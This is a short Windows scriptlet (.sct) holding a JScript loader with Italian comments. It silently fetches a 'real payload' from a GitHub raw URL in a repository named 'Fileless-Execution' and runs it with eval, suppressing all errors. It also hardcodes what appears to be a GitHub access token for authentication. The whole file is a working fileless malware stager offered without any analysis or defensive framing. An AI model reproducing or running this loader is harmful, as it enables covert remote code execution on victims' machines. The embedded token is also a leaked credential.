<?XML version="1.0"?>
<scriptlet>
<registration progid="Loader" classid="{F0001111-0000-0000-0000-0000FEEDACDC}">
<script language="JScript">
<![CDATA[
try {
    // Token permanente
    var token = "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";
    
    // Scarica il vero payload con autenticazione
    var xhr = new ActiveXObject("MSXML2.XMLHTTP");
    xhr.open("GET", "https://raw.githubusercontent.com/bna169/Fileless-Execution/refs/heads/main/run.sct", false);
    xhr.setRequestHeader("Authorization", "token " + token);
    xhr.send();
    
    var payloadCode = xhr.responseText;
    
    // Esegui il codice JScript contenuto nel payload
    eval(payloadCode);
    
} catch(e) {
    // Silenzioso se fallisce
}
]]>
</script>
</registration>
</scriptlet>
